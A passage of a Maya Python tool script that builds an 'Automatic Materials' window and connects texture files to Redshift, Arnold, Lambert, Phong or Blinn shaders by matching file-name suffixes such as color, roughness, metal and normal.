elif cmds.ls(selection = True, type = 'RedshiftMaterial'):
global selected_shader
selected_shader = cmds.ls(selection = True, type = 'RedshiftMaterial')[0]
my_array = ['.diffuse_color','.refl_roughness','.refl_metalness','.bump_input',
'.ms_amount', '.emission_color', '.refl_ior', '.opacity_color']
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_2
connected_2 = cmds.listConnections(selected_shader + my_array[1])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_5
connected_5 = cmds.listConnections(selected_shader + my_array[4])
global connected_6
connected_6 = cmds.listConnections(selected_shader + my_array[5])
global connected_7
connected_7 = cmds.listConnections(selected_shader + my_array[6])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
global i
for i in names:
if color_text in i or color_alt_text in i:
color_func('.diffuse_color')
if roughness_text in i or roughness_alt_text in i:
roughness_func('.refl_roughness')
if metal_text in i or metal_alt_text in i:
metal_func('.refl_metalness')
if normal_text in i:
rs_normal_func()
if scatter_text in i:
scatter_func('.ms_amount')
if emissive_text in i:
emissive_func('.emission_color')
if ior_text in i or 'Ior' in i or 'IOR' in i:
ior_func('.refl_ior')
if opacity_text in i or 'opacity' in i:
opacity_func('.opacity_color')
#lambert
elif cmds.ls(selection = True, type = 'lambert'):
global selected_shader
selected_shader = cmds.ls(selection = True, type = 'lambert')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[7] = '.transparency'
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
global i
for i in names:
if color_text in i or color_alt_text in i:
color_func()
if normal_text in i:
normal_func()
if opacity_text in i or 'opacity' in i:
opacity_func()
def Delete_shaders():
cmds.delete(cmds.ls(type = 'shadingDependNode'))
cmds.delete(cmds.ls(type = 'shadingEngine'))
for i in all_nodes_list:
cmds.delete(cmds.ls(type = i))
def normal_flip():
if default_shader == redshift:
norm_flip_var = cmds.ls( type = 'RedshiftNormalMap')
for i in norm_flip_var:
norm_flip_val = cmds.getAttr('{0}.flipY'.format(i))
if norm_flip_val == False:
cmds.setAttr('{0}.flipY'.format(i), 1)
else:
cmds.setAttr('{0}.flipY'.format(i), 0)
def light_func():
if default_shader == redshift:
mel.eval('redshiftCreateDomeLight')
rs_dome = cmds.ls(type = 'RedshiftDomeLight')[0]
cmds.setAttr('{0}.tex0'.format(rs_dome),default_pano, type = 'string')
elif default_shader == arnold:
mel.eval('cmdSkydomeLight')
ar_dome = cmds.ls(type = 'aiSkyDomeLight')[0]
place2d = cmds.shadingNode('place2dTexture', asUtility = True)
text_file = cmds.shadingNode('file', isColorManaged = True, asTexture = True, name = ar_dome)
cmds.connectAttr(place2d +'.outUV', text_file + '.uvCoord')
cmds.setAttr(text_file + '.fileTextureName',default_pano, type = 'string')
cmds.connectAttr(place2d +'.outUvFilterSize',text_file + '.uvFilterSize')
connections = ['rotateUV','offset','noiseUV','vertexCameraOne','vertexUvThree','vertexUvTwo','vertexUvOne',
'repeatUV','wrapV','wrapU','stagger','mirrorU','mirrorV','rotateFrame','translateFrame','coverage']
for c in connections:
cmds.connectAttr(place2d + '.' + c, text_file + '.' + c)
cmds.connectAttr('{0}.outColor'.format(text_file),'{0}.color'.format(ar_dome))
seperator_size = 20
but_wid = 60
but_hi = 30
if cmds.window('myWindow', exists = True):
cmds.deleteUI('myWindow')
cmds.window('myWindow', title = 'Automatic Materials')
cmds.showWindow('myWindow')
third_layout = cmds.columnLayout()
cmds.separator(height= seperator_size/4)
cmds.text(label = 'Search set project or select a file folder?')
# Project is set?
collection1 = cmds.radioCollection()
cmds.radioButton( label='Set Project', select = True, onCommand = 'project()')
cmds.radioButton( label='Select a File Directory', onCommand = 'filedirectory()')
#object matching?
cmds.separator(height= seperator_size)
cmds.text(label = 'Apply materials to matching object names')
collection2 = cmds.radioCollection()
cmds.radioButton( label='True', select = True, onCommand = 'obj_match()')
cmds.radioButton( label='False', onCommand = 'obj_no_match()')
#Material Suffix
sep = cmds.separator(height= seperator_size)
third_layout
cmds.text(align = 'left', label = 'Material_Suf')
mat_but = cmds.textField('suffix', receiveFocusCommand = 'suffix_func()', width = 60)
cmds.separator(height = 20)
#Selected shader
cmds.text(label = 'Select a Shader')
#Shader List
sec_layout = cmds.rowColumnLayout(numberOfColumns = 5)
collection3 = cmds.radioCollection()
cmds.radioButton( label='redshift',select = True, onCommand = 'red()')
cmds.radioButton( label='arnold', onCommand = 'arn()')
cmds.radioButton( label='lambert', onCommand = 'lam()')
cmds.radioButton( label='phong', onCommand = 'pho()')
cmds.radioButton( label='blinn', onCommand = 'bli()')
cmds.separator(height= seperator_size, visible = False)
cmds.separator(height= seperator_size, visible = False)
cmds.separator(height= seperator_size, visible = False)
cmds.separator(height= seperator_size, visible = False)
cmds.separator(height= seperator_size, visible = False)
cmds.button(label = 'Run', width = but_wid, height = but_hi, command = 'Run_shader()')
cmds.button(label = 'Delete', width = but_wid, height = but_hi, command = 'Delete_shaders()')
cmds.button(label = 'Selected', width = but_wid, height = but_hi, command = 'Selected()')
cmds.button(label = 'Norm Flip', width = but_wid, height = but_hi, command = 'normal_flip()')
cmds.button(label = 'Light', width = but_wid, height = but_hi, command = 'light_func()')
#End of UI Stuff
if ui == False:
if cmds.ls(selection = True, type = 'file'): #If a texture file is selected
#Arnold
if cmds.ls(selection = True, type = 'aiStandardSurface'):#If arnold is selected
selected_shader = cmds.ls(selection = True, type = 'aiStandardSurface')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
#3 mfis
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
for i in names:
if color_text in i or color_alt_text in i:
color_func('.baseColor')
if roughness_text in i or roughness_alt_text in i:
roughness_func()
if metal_text in i or metal_alt_text in i:
metal_func('.metalness')
if normal_text in i:
normal_func()
if scatter_text in i:
scatter_func('.subsurface')
if emissive_text in i:
emissive_func('.emissionColor')
if ior_text in i or 'Ior' in i or 'IOR' in i:
ior_func('.specularIOR')
if opacity_text in i or 'opacity' in i:
opacity_func('.opacity')
#Blinn
elif cmds.ls(selection = True, type = 'blinn'):
selected_shader = cmds.ls(selection = True, type = 'blinn')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
for i in names:
if color_text in i or color_alt_text in i:
color_func()
if metal_text in i or metal_alt_text in i:
metal_func()
if normal_text in i:
normal_func()
if opacity_text in i or 'opacity' in i:
opacity_func()
#Phong
elif cmds.ls(selection = True, type = 'phong'):
selected_shader = cmds.ls(selection = True, type = 'phong')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
for i in names:
if color_text in i or color_alt_text in i:
color_func()
if metal_text in i or metal_alt_text in i:
metal_func()
if normal_text in i:
normal_func()
if opacity_text in i or 'opacity' in i:
opacity_func()
#RedshiftMaterial
elif cmds.ls(selection = True, type = 'RedshiftMaterial'):
selected_shader = cmds.ls(selection = True, type = 'RedshiftMaterial')[0]
my_array = ['.diffuse_color','.refl_roughness','.refl_metalness','.bump_input',
'.ms_amount', '.emission_color', '.refl_ior', '.opacity_color']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
for i in names:
if color_text in i or color_alt_text in i:
color_func('.diffuse_color')
if roughness_text in i or roughness_alt_text in i:
roughness_func('.refl_roughness')
if metal_text in i or metal_alt_text in i:
metal_func('.refl_metalness')
if normal_text in i:
rs_normal_func()
if scatter_text in i:
scatter_func('.ms_amount')
if emissive_text in i:
emissive_func('.emission_color')
if ior_text in i or 'Ior' in i or 'IOR' in i:
ior_func('.refl_ior')
if opacity_text in i or 'opacity' in i:
opacity_func('.opacity_color')
#lambert
elif cmds.ls(selection = True, type = 'lambert'):
selected_shader = cmds.ls(selection = True, type = 'lambert')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
for i in names:
if color_text in i or color_alt_text in i:
color_func()
if normal_text in i:
normal_func()
if opacity_text in i or 'opacity' in i:
opacity_func()
else:
cmds.warning('Please select your file(s) and a shader.')
else:
if project_is_set == True:
basePath = cmds.workspace(q = True, rd = True)
basePath = basePath + default_project_image_directory
if project_is_set == False:
basePath = cmds.fileDialog2(fileMode=2, caption="Import Folder")[0]
directory = cmds.getFileList(folder = basePath)
dir_array = []
dir = ''
dir_path_array = []
dir_len_array = []
for i in directory:
if not '.png' in i:
if not '.tx' in i:
if not '.tga' in i:
if not '.jpeg' in i:
if not '.jpg' in i:
if not '.tif' in i:
if not'.raw' in i:
dir = (basePath + '/' + i)
dir_path_array.append(dir)
dir2 = cmds.getFileList(folder = dir)
dir_len_array.append(dir)
dir_array.append(dir2)
dir_length = len(dir_len_array)
dir_var = 0
while dir_var < dir_length:
arrays_func(dir_var)
dir_var = dir_var + 1
selected_shader = cmds.shadingNode(default_shader, asShader = True)
shadingEngine = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader + '.outColor', shadingEngine + '.surfaceShader')
selected_shader2 = selected_shader
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
arnold_shaders = cmds.ls(type = 'aiStandardSurface')
blinn_shaders = cmds.ls(type = 'blinn')
phong_shaders = cmds.ls(type = 'phong')
lambert_shaders = cmds.ls(type = 'lambert')
redshift_shaders = cmds.ls(type = 'RedshiftMaterial')
#Directory 2
for i in dir_total:
if '.png' in i or '.jpg' in i or '.jpeg' in i or '.tga' in i or '.tif' in i or 'raw' in i:
if not '.swatch' in i:
if color_text in i:
cut = i.partition('_Base_' + color_text)
shader_create_func()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
shader_create_func()
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
shader_create_func()
if roughness_alt_text in i:
cut = i.partition('_' + roughness_alt_text)
shader_create_func()
if metal_text in i:
cut = i.partition('_' + metal_text)
shader_create_func()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
shader_create_func()
if normal_text in i:
cut = i.partition('_' + normal_text)
shader_create_func()
if scatter_text in i:
cut = i.partition('_' + scatter_text)
shader_create_func()
if emissive_text in i:
cut = i.partition('_' + emissive_text)
shader_create_func()
if ior_text in i:
cut = i.partition('_' + ior_text)
shader_create_func()
if 'Ior' in i:
cut = i.partition('_Ior')
shader_create_func()
if 'IOR' in i:
cut = i.partition('_IOR')
shader_create_func()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
shader_create_func()
if 'opacity' in i:
cut = i.partition('_opacity')
shader_create_func()
if cmds.nodeType(selected_shader) == 'aiStandardSurface':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == arnold:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2()
if same_name == False:
roughness_func2()
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2()
if same_name == False:
roughness_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if scatter_text in i:
cut = i.partition('_' + scatter_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
scatter_func2('.subsurface')
if same_name == False:
scatter_func2('.subsurface')
if emissive_text in i:
cut = i.partition('_' + emissive_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
emissive_func2('.emissionColor')
if same_name == False:
emissive_func2('.emissionColor')
if ior_text in i:
cut = i.partition('_' + ior_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if 'Ior' in i:
cut = i.partition('_Ior')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if 'IOR' in i:
cut = i.partition('_IOR')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
#Blinn
elif cmds.nodeType(selected_shader) == 'blinn':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == blinn:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#Phong
elif cmds.nodeType(selected_shader) == 'phong':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == phong:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i :
cut = i.partition('_' + opacity_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#RedshiftMaterial
elif cmds.nodeType(selected_shader) == 'RedshiftMaterial':
my_array = ['.diffuse_color','.refl_roughness','.refl_metalness','.bump_input',
'.ms_amount', '.emission_color', '.refl_ior', '.opacity_color']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == redshift:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2('.refl_roughness')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
roughness_func2('.refl_roughness')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2('.refl_roughness')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
roughness_func2('.refl_roughness')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
rs_normal_func2()
if same_name == False:
rs_normal_func2()
if scatter_text in i:
cut = i.partition('_' + scatter_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
scatter_func2('.ms_amount')
if same_name == False:
scatter_func2('.ms_amount')
if emissive_text in i:
cut = i.partition('_' + emissive_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
emissive_func2('.emission_color')
if same_name == False:
emissive_func2('.emission_color')
if ior_text in i:
cut = i.partition('_' + ior_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if 'Ior' in i:
cut = i.partition('_Ior')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if 'IOR' in i:
cut = i.partition('_IOR')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
